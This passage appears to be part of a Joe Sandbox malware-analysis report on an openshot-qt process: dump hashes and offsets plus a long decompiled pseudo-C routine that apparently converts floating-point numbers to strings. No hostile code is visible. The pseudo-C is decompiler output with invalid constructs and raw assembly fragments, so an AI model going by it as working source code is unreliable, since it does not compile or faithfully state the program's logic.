                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf7e81038b3bcfc4c98896e86a4db392fee6b718ecf5c5605d41e2fe20131533
                                                                    • Instruction ID: c054d92d1cc999c80ca51307f1cfa7b49d86bea4e00f24fbf2cc9ede17adb024
                                                                    • Opcode Fuzzy Hash: cf7e81038b3bcfc4c98896e86a4db392fee6b718ecf5c5605d41e2fe20131533
                                                                    • Instruction Fuzzy Hash: 7CE0B674910208DFCB40DFA8D449A9DBBF4EF08305F6041A9E808D7360E7319E80CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a10e677ba818c059a25bb3f93d4a11054957e56aa0ba794981b85d471fe94eda
                                                                    • Instruction ID: e02d6e7dbd4f5bc299592b60c251cadf6d6fa3b50043836572e0fe89fa0db0fa
                                                                    • Opcode Fuzzy Hash: a10e677ba818c059a25bb3f93d4a11054957e56aa0ba794981b85d471fe94eda
                                                                    • Instruction Fuzzy Hash: C7D05EB0806218DBCB05AFB8A5156ADBFB8EF42305F6041E9D80427394CB321A90DB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4577709f43a4dcd90ebfcc626780ac1976380a389b91ee0a89fd277072cb7d55
                                                                    • Instruction ID: cdc5826a2201e662c24e242740c75ff8f6dea3a1593c77d912ccf9e2ec2b387f
                                                                    • Opcode Fuzzy Hash: 4577709f43a4dcd90ebfcc626780ac1976380a389b91ee0a89fd277072cb7d55
                                                                    • Instruction Fuzzy Hash: 29C012708021089BC714DBA9E91575EB76CEB41304F100299D80417254DB721A40D699
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                    • String ID: ,0$__deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                                                                    • API String ID: 384173800-4094535815
                                                                    • Opcode ID: e2caf63bcca83d9516d316d11d26803dda06c0db44084f9d202d7bc3ef4ad1ea
                                                                    • Instruction ID: 1fbb18e9f9eb985ebf0a6dd98eefce5319a908933e33055b4b96e0431c444894
                                                                    • Opcode Fuzzy Hash: e2caf63bcca83d9516d316d11d26803dda06c0db44084f9d202d7bc3ef4ad1ea
                                                                    • Instruction Fuzzy Hash: CB0121B59073088BC7027F79AD6835EBFF8EB84351F02492EE5854B291E7B49448CB93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 31%
                                                                    			E00305C70(void* __fp0, char* _a4, signed char _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                                    				signed int _v32;
                                                                    				signed int _v46;
                                                                    				short _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				signed int _v64;
                                                                    				signed char _v68;
                                                                    				signed int _v72;
                                                                    				signed int _v76;
                                                                    				signed int _v80;
                                                                    				signed int _v84;
                                                                    				signed int _v88;
                                                                    				signed int _v92;
                                                                    				signed int _v96;
                                                                    				signed int _v100;
                                                                    				signed int _v104;
                                                                    				signed int _v108;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				signed int _v124;
                                                                    				signed int _v128;
                                                                    				signed int _v132;
                                                                    				signed int _v136;
                                                                    				signed int _v140;
                                                                    				signed int _v144;
                                                                    				signed int _v148;
                                                                    				signed int _v152;
                                                                    				signed int _v156;
                                                                    				signed int _v160;
                                                                    				signed int _v164;
                                                                    				signed int _v180;
                                                                    				signed int _v184;
                                                                    				signed int __ebx;
                                                                    				signed int __edi;
                                                                    				signed int __esi;
                                                                    				signed int __ebp;
                                                                    				signed int* _t622;
                                                                    				intOrPtr* _t629;
                                                                    				signed int* _t630;
                                                                    				signed int _t632;
                                                                    				signed char _t634;
                                                                    				signed int _t638;
                                                                    				signed int _t639;
                                                                    				signed int _t640;
                                                                    				signed char* _t641;
                                                                    				signed int _t644;
                                                                    				signed int* _t646;
                                                                    				void* _t648;
                                                                    				signed int _t653;
                                                                    				signed char* _t654;
                                                                    				void* _t658;
                                                                    				void* _t659;
                                                                    				intOrPtr* _t660;
                                                                    
                                                                    				_t659 = _t658 - 0xac;
                                                                    				_t644 = _a4;
                                                                    				_v148 = _a8;
                                                                    				_v164 = _a20;
                                                                    				_v152 = _a12;
                                                                    				_t622 = _a16;
                                                                    				_v136 = _a24;
                                                                    				_v116 = _t622;
                                                                    				_v160 = _a28;
                                                                    				_t653 =  *_t622;
                                                                    				_v156 = _a32;
                                                                    				_v140 = _t644;
                                                                    				 *_t622 = _t653 & 0xffffffcf;
                                                                    				if((_t653 & 0x00000007) == 3) {
                                                                    					 *_v160 = 0xffff8000;
                                                                    					_a12 = 8;
                                                                    					_a8 = _v156;
                                                                    					_a4 = "Infinity";
                                                                    					_t659 = _t659 + 0xac;
                                                                    					_pop(_t633);
                                                                    					_pop(_t653);
                                                                    					_pop(_t644);
                                                                    					goto L1;
                                                                    				} else {
                                                                    					__ecx = __esi;
                                                                    					__ecx = __esi & 0x00000004;
                                                                    					__eflags = __ecx;
                                                                    					_v144 = __ecx;
                                                                    					if(__ecx != 0) {
                                                                    						__ebx = 0;
                                                                    						__eflags = __eax - 4;
                                                                    						if(__eax != 4) {
                                                                    							goto L14;
                                                                    						} else {
                                                                    							__eax = _v160;
                                                                    							 *_v160 = 0xffff8000;
                                                                    							__eax = _v156;
                                                                    							_a12 = 3;
                                                                    							_a8 = _v156;
                                                                    							_a4 = "NaN";
                                                                    							__esp =  &(__esp[0x2b]);
                                                                    							_pop(__ebx);
                                                                    							_pop(__esi);
                                                                    							_pop(__edi);
                                                                    							_pop(__ebp);
                                                                    							L1:
                                                                    							_push(_t644);
                                                                    							_push(_t653);
                                                                    							_push(_t633);
                                                                    							_t660 = _t659 - 0x10;
                                                                    							_t638 = _a12;
                                                                    							_t654 = _a4;
                                                                    							_t634 = _a8;
                                                                    							if(_t638 <= 0x13) {
                                                                    							} else {
                                                                    								_t632 = 4;
                                                                    								_t648 = 0;
                                                                    								do {
                                                                    									_t632 = _t632 + _t632;
                                                                    									_t648 = _t648 + 1;
                                                                    									_t20 = _t632 + 0xf; // 0x13
                                                                    								} while (_t638 > _t20);
                                                                    							}
                                                                    							 *_t660 = 0;
                                                                    							_t629 = E00307630();
                                                                    							_t641 =  &(_t654[1]);
                                                                    							 *_t629 = 0;
                                                                    							_t639 =  *_t654 & 0x000000ff;
                                                                    							_t22 = _t629 + 4; // 0x4
                                                                    							_t646 = _t22;
                                                                    							 *(_t629 + 4) = _t639;
                                                                    							_t630 = _t646;
                                                                    							if(_t639 != 0) {
                                                                    								do {
                                                                    									_t640 =  *_t641 & 0x000000ff;
                                                                    									_t630 =  &(_t630[0]);
                                                                    									_t641 =  &(_t641[1]);
                                                                    									 *_t630 = _t640;
                                                                    								} while (_t640 != 0);
                                                                    							}
                                                                    							if(_t634 != 0) {
                                                                    								 *_t634 = _t630;
                                                                    							}
                                                                    							return _t646;
                                                                    						}
                                                                    					} else {
                                                                    						__eflags = __eax;
                                                                    						if(__eax == 0) {
                                                                    							L35:
                                                                    							__eax = _v160;
                                                                    							 *_v160 = 1;
                                                                    							__eax = _v156;
                                                                    							_v180 = 1;
                                                                    							_v184 = __eax;
                                                                    							 *__esp = "0";
                                                                    							L1();
                                                                    							__esp =  &(__esp[0x2b]);
                                                                    							__ebx = __eax;
                                                                    							_pop(__ebx);
                                                                    							_pop(__esi);
                                                                    							_pop(__edi);
                                                                    							_pop(__ebp);
                                                                    							return __eax;
                                                                    						} else {
                                                                    							__eax = __eax - 1;
                                                                    							__ebx = 0;
                                                                    							__eflags = __eax - 1;
                                                                    							if(__eax <= 1) {
                                                                    								__edi =  *__edi;
                                                                    								__edx = 0;
                                                                    								__eax = 0x20;
                                                                    								__eflags = __edi - 0x20;
                                                                    								if(__edi > 0x20) {
                                                                    									do {
                                                                    										__eax = __eax + __eax;
                                                                    										__edx = __edx + 1;
                                                                    										__eflags = __edi - __eax;
                                                                    									} while (__edi > __eax);
                                                                    								}
                                                                    								 *__esp = __edx;
                                                                    								__edi - 1 = __edi - 1 >> 5;
                                                                    								__ebx = __edi - 1 >> 5 << 2;
                                                                    								__eflags = __ebx;
                                                                    								__eax = E00307630();
                                                                    								_v132 = __ebx;
                                                                    								__ebp = __eax;
                                                                    								__eax = _v152;
                                                                    								_t33 =  &_a20; // 0x14
                                                                    								__edx = _t33;
                                                                    								__ecx = __eax + __ebx;
                                                                    								goto L20;
                                                                    								while(1) {
                                                                    									L23:
                                                                    									__eax = __ebx;
                                                                    									__ebx = __ebx - 1;
                                                                    									__edx =  *(__ebp + 0x14 + __ebx * 4);
                                                                    									__eflags = __edx;
                                                                    									if(__edx != 0) {
                                                                    										break;
                                                                    									}
                                                                    									__eflags = __ebx;
                                                                    									if(__ebx == 0) {
                                                                    										_a16 = 0;
                                                                    									} else {
                                                                    										continue;
                                                                    									}
                                                                    									L25:
                                                                    									__eax = E003074D0(__ebp);
                                                                    									__ecx = _v148;
                                                                    									_v32 = __eax;
                                                                    									_v92 = _v148;
                                                                    									__eflags = __eax;
                                                                    									if(__eax != 0) {
                                                                    										_v148 = _v148 + _v32;
                                                                    										_v92 = _v148 + _v32;
                                                                    										__ebx = __ebx - _v32;
                                                                    									}
                                                                    									__ecx = _a16;
                                                                    									__eflags = _a16;
                                                                    									if(_a16 == 0) {
                                                                    										__eax = E00307720(__ebp);
                                                                    										goto L35;
                                                                    									} else {
                                                                    										 &_v32 = E00308070(__ebp,  &_v32);
                                                                    										__ecx = _v92;
                                                                    										_v132 = __fp0;
                                                                    										__edx = _v128;
                                                                    										__eax = _v132;
                                                                    										__ecx = _v92 + __ebx;
                                                                    										_v128 = _v128 & 0x000fffff;
                                                                    										_v108 = __ecx;
                                                                    										__ecx = __ecx - 1;
                                                                    										__eax = _v128 & 0x000fffff | 0x3ff00000;
                                                                    										_v124 = __ecx;
                                                                    										__edx = __ecx;
                                                                    										_v128 = __eax;
                                                                    										__fp0 = _v132;
                                                                    										__edx = __ecx >> 0x1f;
                                                                    										_v132 -  *0x30a848 = (_v132 -  *0x30a848) *  *0x30a850;
                                                                    										__fp0 = (_v132 -  *0x30a848) *  *0x30a850 +  *0x30a858;
                                                                    										asm("fild dword [esp+0x40]");
                                                                    										__fp0 = ((_v132 -  *0x30a848) *  *0x30a850 +  *0x30a858) *  *0x30a860;
                                                                    										_v124 = __edx;
                                                                    										__edx = __edx ^ __ecx;
                                                                    										__edx = __edx - _v124;
                                                                    										__edx = __edx - 0x435;
                                                                    										asm("faddp st1, st0");
                                                                    										__eflags = __edx;
                                                                    										if(__edx > 0) {
                                                                    											_v124 = __edx;
                                                                    											asm("fild dword [esp+0x40]");
                                                                    											__fp0 = __fp0 *  *0x30a868;
                                                                    											asm("faddp st1, st0");
                                                                    										}
                                                                    										asm("fnstcw word [esp+0x8e]");
                                                                    										__edx = _v46 & 0x0000ffff;
                                                                    										__dh = __dh | 0x0000000c;
                                                                    										__eflags = __dh;
                                                                    										_v48 = __dx;
                                                                    										asm("fldcw word [esp+0x8c]");
                                                                    										asm("fist dword [esp+0x4c]");
                                                                    										asm("fldcw word [esp+0x8e]");
                                                                    										asm("fldz");
                                                                    										asm("fcomip st0, st1");
                                                                    										if(__eflags > 0) {
                                                                    											asm("fild dword [esp+0x4c]");
                                                                    											asm("fucomi st0, st1");
                                                                    											if(__eflags != 0) {
                                                                    												st0 = __fp0;
                                                                    												st0 = __fp0;
                                                                    												goto L118;
                                                                    											} else {
                                                                    												asm("fcomip st0, st1");
                                                                    												st0 = __fp0;
                                                                    												if(__eflags != 0) {
                                                                    													L118:
                                                                    													_v112 = _v112 - 1;
                                                                    												}
                                                                    												goto L31;
                                                                    											}
                                                                    											L110:
                                                                    											__eax = E00307720(__ebp);
                                                                    											__esi = _v160;
                                                                    											__eax = _v96;
                                                                    											__edi = _v136;
                                                                    											 *__eax = 0;
                                                                    											 *_v160 = _v136;
                                                                    											__esi = _v156;
                                                                    											__eflags = __esi;
                                                                    											if(__esi != 0) {
                                                                    												 *__esi = __eax;
                                                                    											}
                                                                    											__eax = _v116;
                                                                    											__esi = _v144;
                                                                    											 *__eax =  *__eax | _v144;
                                                                    											__eflags =  *__eax;
                                                                    											__esp =  &(__esp[0x2b]);
                                                                    											__eax = __ebx;
                                                                    											_pop(__ebx);
                                                                    											_pop(__esi);
                                                                    											_pop(__edi);
                                                                    											_pop(__ebp);
                                                                    											return __ebx;
                                                                    											goto L304;
                                                                    										} else {
                                                                    											st0 = __fp0;
                                                                    										}
                                                                    										L31:
                                                                    										__ecx = __ecx << 0x14;
                                                                    										__eax = __eax + (__ecx << 0x14);
                                                                    										__edx = _v112;
                                                                    										_v128 = __eax;
                                                                    										__eax = __ebx;
                                                                    										__eax = __ebx - __ecx;
                                                                    										__ecx = __eax - 1;
                                                                    										_v100 = __eax - 1;
                                                                    										__eflags = __edx - 0x16;
                                                                    										if(__eflags > 0) {
                                                                    											_v72 = 1;
                                                                    											goto L40;
                                                                    										} else {
                                                                    											__fp0 =  *(0x30a8c0 + __edx * 8);
                                                                    											asm("fst qword [esp+0x40]");
                                                                    											__fp0 = _v132;
                                                                    											asm("fxch st0, st1");
                                                                    											asm("fcomip st0, st1");
                                                                    											st0 = __fp0;
                                                                    											if(__eflags <= 0) {
                                                                    												__edx = _v100;
                                                                    												_v72 = 0;
                                                                    												_v88 = 0;
                                                                    												__eflags = _v100;
                                                                    												if(_v100 < 0) {
                                                                    													goto L113;
                                                                    												} else {
                                                                    													goto L74;
                                                                    												}
                                                                    												goto L304;
                                                                    											} else {
                                                                    												__edx = __edx - 1;
                                                                    												_v72 = 0;
                                                                    												_v112 = __edx;
                                                                    												L40:
                                                                    												__edx = _v100;
                                                                    												_v88 = 0;
                                                                    												__eflags = _v100;
                                                                    												if(_v100 < 0) {
                                                                    													L113:
                                                                    													__edx = 1;
                                                                    													_v100 = 0;
                                                                    													__edx = 1 - __eax;
                                                                    													_v88 = 1 - __eax;
                                                                    												}
                                                                    												__eax = _v112;
                                                                    												__eflags = _v112;
                                                                    												if(_v112 >= 0) {
                                                                    													L74:
                                                                    													__ecx = _v112;
                                                                    													_v76 = 0;
                                                                    													_v100 = _v100 + __ecx;
                                                                    													_v80 = __ecx;
                                                                    												} else {
                                                                    													__eax = _v112;
                                                                    													_t91 =  &_v88;
                                                                    													 *_t91 = _v88 - __eax;
                                                                    													__eflags =  *_t91;
                                                                    													_v112 = 0;
                                                                    													__edx = __eax;
                                                                    													_v80 = __eax;
                                                                    													__edx =  ~__eax;
                                                                    													_v76 =  ~__eax;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										__eax = _v164;
                                                                    										__eflags = __eax - 9;
                                                                    										if(__eax > 9) {
                                                                    											_v164 = 0;
                                                                    											goto L76;
                                                                    										} else {
                                                                    											__eflags = __eax - 5;
                                                                    											if(__eax > 5) {
                                                                    												__eax = __eax - 4;
                                                                    												_v68 = 0;
                                                                    												_v164 = __eax;
                                                                    											} else {
                                                                    												__eax = _v108;
                                                                    												__eax = _v108 + 0x3fd;
                                                                    												__eflags = __eax - 0x7f7;
                                                                    												_t99 = __eax - 0x7f7 < 0;
                                                                    												__eflags = _t99;
                                                                    												__eax = __al & 0x000000ff;
                                                                    												_v68 = __al & 0x000000ff;
                                                                    											}
                                                                    											__eax = _v164;
                                                                    											__eflags = __eax - 4;
                                                                    											if(__eax == 4) {
                                                                    												_v84 = 1;
                                                                    												goto L50;
                                                                    											} else {
                                                                    												__eflags = __eax - 5;
                                                                    												if(__eax == 5) {
                                                                    													_v84 = 1;
                                                                    													goto L138;
                                                                    												} else {
                                                                    													__eflags = __eax - 2;
                                                                    													if(__eax != 2) {
                                                                    														__eflags = __eax - 3;
                                                                    														if(__eax != 3) {
                                                                    															L76:
                                                                    															_v136 = __edi;
                                                                    															asm("fild dword [esp+0x34]");
                                                                    															__fp0 = __fp0 *  *0x30a870;
                                                                    															asm("fldcw word [esp+0x8c]");
                                                                    															asm("fistp dword [esp+0x34]");
                                                                    															asm("fldcw word [esp+0x8e]");
                                                                    															__eax = _v136;
                                                                    															__eax = _v136 + 3;
                                                                    															 *__esp = __eax;
                                                                    															_v32 = __eax;
                                                                    															_v96 = E00305970();
                                                                    															__eax = _v140;
                                                                    															__eax =  *(_v140 + 0xc);
                                                                    															_v136 = __eax;
                                                                    															__eax = __eax - 1;
                                                                    															__eflags = __eax;
                                                                    															_v108 = __eax;
                                                                    															if(__eax != 0) {
                                                                    																_v136 = 0;
                                                                    																_v68 = 0;
                                                                    																_v84 = 1;
                                                                    																_v64 = 0xffffffff;
                                                                    																_v124 = 0xffffffff;
                                                                    																goto L52;
                                                                    															} else {
                                                                    																__esi = _v92;
                                                                    																__eflags = __esi;
                                                                    																if(__esi < 0) {
                                                                    																	__eax = _v140;
                                                                    																	__edi = __edi - __ebx;
                                                                    																	_v136 = 0;
                                                                    																	__ecx = __edi + 1;
                                                                    																	__esi = __esi - __edi;
                                                                    																	_v124 = 0xffffffff;
                                                                    																	__eax =  *(_v140 + 4);
                                                                    																	_v32 = __ecx;
                                                                    																	_v64 = 0xffffffff;
                                                                    																	__eflags = __eax - __esi;
                                                                    																	if(__eax > __esi) {
                                                                    																		goto L81;
                                                                    																	} else {
                                                                    																		goto L84;
                                                                    																	}
                                                                    																} else {
                                                                    																	__eax = _v140;
                                                                    																	__esi = _v80;
                                                                    																	__eflags =  *((intOrPtr*)(__eax + 0x14)) - _v80;
                                                                    																	if( *((intOrPtr*)(__eax + 0x14)) >= _v80) {
                                                                    																		__eax = _v80;
                                                                    																		_v124 = 0xffffffff;
                                                                    																		__fp0 =  *(0x30a8c0 + _v80 * 8);
                                                                    																		goto L208;
                                                                    																	} else {
                                                                    																		_v136 = 0;
                                                                    																		_v64 = 0xffffffff;
                                                                    																		_v124 = 0xffffffff;
                                                                    																		goto L80;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															_v84 = 0;
                                                                    															L138:
                                                                    															__eax = _v136;
                                                                    															__eax = _v136 + _v80;
                                                                    															_v64 = __eax;
                                                                    															__eax = __eax + 1;
                                                                    															_v124 = __eax;
                                                                    															__eflags = __eax;
                                                                    															if(__eax <= 0) {
                                                                    																_v32 = 1;
                                                                    																__eax = 1;
                                                                    															} else {
                                                                    																_v32 = __eax;
                                                                    															}
                                                                    															goto L51;
                                                                    														}
                                                                    													} else {
                                                                    														_v84 = 0;
                                                                    														L50:
                                                                    														__ecx = _v136;
                                                                    														__eax = 1;
                                                                    														__eflags = __ecx;
                                                                    														__eax =  >  ? __ecx : 1;
                                                                    														_v32 = 1;
                                                                    														_v64 = 1;
                                                                    														_v124 = 1;
                                                                    														_v136 = 1;
                                                                    														L51:
                                                                    														__eax = E00305970(__eax);
                                                                    														__eflags = _v124 - 0xe;
                                                                    														_v96 = __eax;
                                                                    														__eax = _v140;
                                                                    														__eax =  *(_v140 + 0xc);
                                                                    														_v108 = __eax;
                                                                    														__eax = __eax & 0xffffff00 | _v124 - 0x0000000e < 0x00000000;
                                                                    														__al = __al & _v68;
                                                                    														_t116 =  &_v108;
                                                                    														 *_t116 = _v108 - 1;
                                                                    														__eflags =  *_t116;
                                                                    														_v68 = __al;
                                                                    														if( *_t116 == 0) {
                                                                    															L54:
                                                                    															__eflags = _v68;
                                                                    															if(_v68 == 0) {
                                                                    																goto L129;
                                                                    															} else {
                                                                    																_v108 = _v108 | _v80;
                                                                    																__eflags = _v108 | _v80;
                                                                    																if((_v108 | _v80) != 0) {
                                                                    																	goto L129;
                                                                    																} else {
                                                                    																	__eax = _v72;
                                                                    																	__fp0 = _v132;
                                                                    																	_v32 = 0;
                                                                    																	__eflags = _v72;
                                                                    																	if(__eflags == 0) {
                                                                    																		L58:
                                                                    																		st0 = st0 + st1;
                                                                    																		__fp0 = st0 + st1 +  *0x30a884;
                                                                    																		_v108 = __fp0;
                                                                    																		__eax = _v108;
                                                                    																		__edx = _v104;
                                                                    																		_v104 = _v104 - 0x3400000;
                                                                    																		_v104 = _v104 - 0x3400000;
                                                                    																		__eax = _v124;
                                                                    																		__eflags = _v124;
                                                                    																		if(__eflags == 0) {
                                                                    																			goto L122;
                                                                    																		} else {
                                                                    																			_v60 = 0;
                                                                    																			__esi = _v124;
                                                                    																			goto L60;
                                                                    																		}
                                                                    																	} else {
                                                                    																		asm("fld1");
                                                                    																		asm("fcomip st0, st1");
                                                                    																		if(__eflags > 0) {
                                                                    																			__eax = _v124;
                                                                    																			__eflags = _v124;
                                                                    																			if(_v124 == 0) {
                                                                    																				st0 = st0 + st1;
                                                                    																				__fp0 = st0 + st1 +  *0x30a884;
                                                                    																				_v108 = __fp0;
                                                                    																				__eax = _v108;
                                                                    																				__edx = _v104;
                                                                    																				__eax = _v104;
                                                                    																				__eax = _v104 - 0x3400000;
                                                                    																				__eflags = __eax;
                                                                    																				_v104 = __eax;
                                                                    																				L122:
                                                                    																				__fp0 = __fp0 -  *0x30a888;
                                                                    																				__fp0 = _v108;
                                                                    																				asm("fxch st0, st1");
                                                                    																				asm("fcomi st0, st1");
                                                                    																				if(__eflags > 0) {
                                                                    																					st0 = __fp0;
                                                                    																					st0 = __fp0;
                                                                    																					_v136 = 2;
                                                                    																					__ebx = _v96;
                                                                    																					__esi = 0;
                                                                    																					_v132 = 0;
                                                                    																					goto L107;
                                                                    																				} else {
                                                                    																					asm("fxch st0, st1");
                                                                    																					asm("fchs");
                                                                    																					asm("fcomip st0, st1");
                                                                    																					st0 = __fp0;
                                                                    																					if(__eflags > 0) {
                                                                    																						goto L143;
                                                                    																					} else {
                                                                    																						goto L128;
                                                                    																					}
                                                                    																				}
                                                                    																			} else {
                                                                    																				__esi = _v64;
                                                                    																				__eflags = __esi;
                                                                    																				if(__esi <= 0) {
                                                                    																					st0 = __fp0;
                                                                    																					goto L128;
                                                                    																				} else {
                                                                    																					__fp0 = __fp0 *  *0x30a87c;
                                                                    																					_v60 = 0xffffffff;
                                                                    																					st0 = st0 *  *0x30a880;
                                                                    																					__fp0 = st0 *  *0x30a880 +  *0x30a884;
                                                                    																					_v108 = st0 *  *0x30a880 +  *0x30a884;
                                                                    																					__eax = _v108;
                                                                    																					__edx = _v104;
                                                                    																					_v104 = _v104 - 0x3400000;
                                                                    																					_v104 = _v104 - 0x3400000;
                                                                    																					L60:
                                                                    																					__eax = _v84;
                                                                    																					__fp0 = _v108;
                                                                    																					__fp0 =  *(0x30a8b8 + __esi * 8);
                                                                    																					__eflags = _v84;
                                                                    																					if(_v84 == 0) {
                                                                    																						asm("fnstcw word [esp+0x8e]");
                                                                    																						asm("fmulp st1, st0");
                                                                    																						__ecx = 0;
                                                                    																						_v56 = __ebp;
                                                                    																						__eax = _v96;
                                                                    																						_v52 = __edi;
                                                                    																						__edi = 0;
                                                                    																						__edx = _v46 & 0x0000ffff;
                                                                    																						__ebp = _v68 & 0x000000ff;
                                                                    																						_v32 = 1;
                                                                    																						__dh = __dh | 0x0000000c;
                                                                    																						__fp0 = st1;
                                                                    																						_v48 = __dx;
                                                                    																						while(1) {
                                                                    																							asm("fldcw word [esp+0x8c]");
                                                                    																							asm("fist dword [esp+0x50]");
                                                                    																							asm("fldcw word [esp+0x8e]");
                                                                    																							__edx = _v108;
                                                                    																							__eflags = __edx;
                                                                    																							if(__edx != 0) {
                                                                    																								asm("fild dword [esp+0x50]");
                                                                    																								__edi = __ebp;
                                                                    																								asm("fsubp st1, st0");
                                                                    																							}
                                                                    																							__eax = __eax + 1;
                                                                    																							__edx = __edx + 0x30;
                                                                    																							 *(__eax - 1) = __dl;
                                                                    																							__ecx = _v32;
                                                                    																							__eflags = __ecx - __esi;
                                                                    																							if(__ecx == __esi) {
                                                                    																								break;
                                                                    																							}
                                                                    																							__ecx = __ecx + 1;
                                                                    																							__eflags = __ecx;
                                                                    																							__fp0 = __fp0 *  *0x30a87c;
                                                                    																							__edi = __ebp;
                                                                    																							_v32 = __ecx;
                                                                    																						}
                                                                    																						__ecx = __edi;
                                                                    																						__ebp = _v56;
                                                                    																						__edi = _v52;
                                                                    																						__eflags = __cl;
                                                                    																						asm("fcmove st0, st2");
                                                                    																						st2 = __fp0;
                                                                    																						 *0x30a88c = st1;
                                                                    																						__fp0 = st1 + st1;
                                                                    																						asm("fxch st0, st3");
                                                                    																						asm("fcomi st0, st3");
                                                                    																						st3 = __fp0;
                                                                    																						if(__eflags > 0) {
                                                                    																							st0 = __fp0;
                                                                    																							st0 = __fp0;
                                                                    																							st0 = __fp0;
                                                                    																							goto L68;
                                                                    																						} else {
                                                                    																							asm("fsubrp st1, st0");
                                                                    																							asm("fcomip st0, st1");
                                                                    																							if(__eflags <= 0) {
                                                                    																								st0 = __fp0;
                                                                    																								goto L128;
                                                                    																							} else {
                                                                    																								asm("fldz");
                                                                    																								__ebx = _v96;
                                                                    																								asm("fucomi st0, st1");
                                                                    																								if(__eflags != 0) {
                                                                    																									st0 = __fp0;
                                                                    																									st0 = __fp0;
                                                                    																									goto L239;
                                                                    																								} else {
                                                                    																									asm("fcomip st0, st1");
                                                                    																									st0 = __fp0;
                                                                    																									if(__eflags == 0) {
                                                                    																										__esi = _v60;
                                                                    																										_v144 = 0;
                                                                    																										_t614 = __esi + 1; // 0x1
                                                                    																										__ecx = _t614;
                                                                    																									} else {
                                                                    																										L239:
                                                                    																										__esi = _v60;
                                                                    																										_v144 = 0x10;
                                                                    																										_t491 = __esi + 1; // 0x1
                                                                    																										__ecx = _t491;
                                                                    																									}
                                                                    																								}
                                                                    																								goto L240;
                                                                    																							}
                                                                    																						}
                                                                    																					} else {
                                                                    																						asm("fxch st0, st2");
                                                                    																						asm("fnstcw word [esp+0x8e]");
                                                                    																						__ecx = _v96;
                                                                    																						__eax = _v46 & 0x0000ffff;
                                                                    																						__ah = __ah | 0x0000000c;
                                                                    																						_v48 = __ax;
                                                                    																						__eax = __ecx + 1;
                                                                    																						asm("fldcw word [esp+0x8c]");
                                                                    																						asm("fist dword [esp+0x50]");
                                                                    																						asm("fldcw word [esp+0x8e]");
                                                                    																						asm("fxch st0, st2");
                                                                    																						asm("fdivr dword [0x30a88c]");
                                                                    																						_v108 & 0x000000ff = (_v108 & 0x000000ff) + 0x30;
                                                                    																						__eflags = (_v108 & 0x000000ff) + 0x30;
                                                                    																						 *__ecx = __dl;
                                                                    																						asm("fsubrp st1, st0");
                                                                    																						asm("fild dword [esp+0x50]");
                                                                    																						asm("fsubp st2, st0");
                                                                    																						asm("fcomi st0, st1");
                                                                    																						if(__eflags <= 0) {
                                                                    																							while(1) {
                                                                    																								__fp0 = st1;
                                                                    																								asm("fsubr dword [0x30a878]");
                                                                    																								asm("fxch st0, st1");
                                                                    																								asm("fcomi st0, st1");
                                                                    																								st1 = __fp0;
                                                                    																								if(__eflags > 0) {
                                                                    																									break;
                                                                    																								}
                                                                    																								_t146 = _v32 + 1; // 0x1
                                                                    																								__edx = _t146;
                                                                    																								_v32 = __edx;
                                                                    																								__eflags = __edx - __esi;
                                                                    																								if(__edx >= __esi) {
                                                                    																									st0 = __fp0;
                                                                    																									st0 = __fp0;
                                                                    																									L128:
                                                                    																									_v108 = 0;
                                                                    																									goto L129;
                                                                    																								} else {
                                                                    																									__fp0 =  *0x30a87c;
                                                                    																									__eax = __eax + 1;
                                                                    																									__fp0 =  *0x30a87c * st0;
                                                                    																									asm("fmulp st2, st0");
                                                                    																									asm("fxch st0, st1");
                                                                    																									asm("fldcw word [esp+0x8c]");
                                                                    																									asm("fist dword [esp+0x50]");
                                                                    																									asm("fldcw word [esp+0x8e]");
                                                                    																									asm("fild dword [esp+0x50]");
                                                                    																									_v108 & 0x000000ff = (_v108 & 0x000000ff) + 0x30;
                                                                    																									__eflags = (_v108 & 0x000000ff) + 0x30;
                                                                    																									asm("fsubp st1, st0");
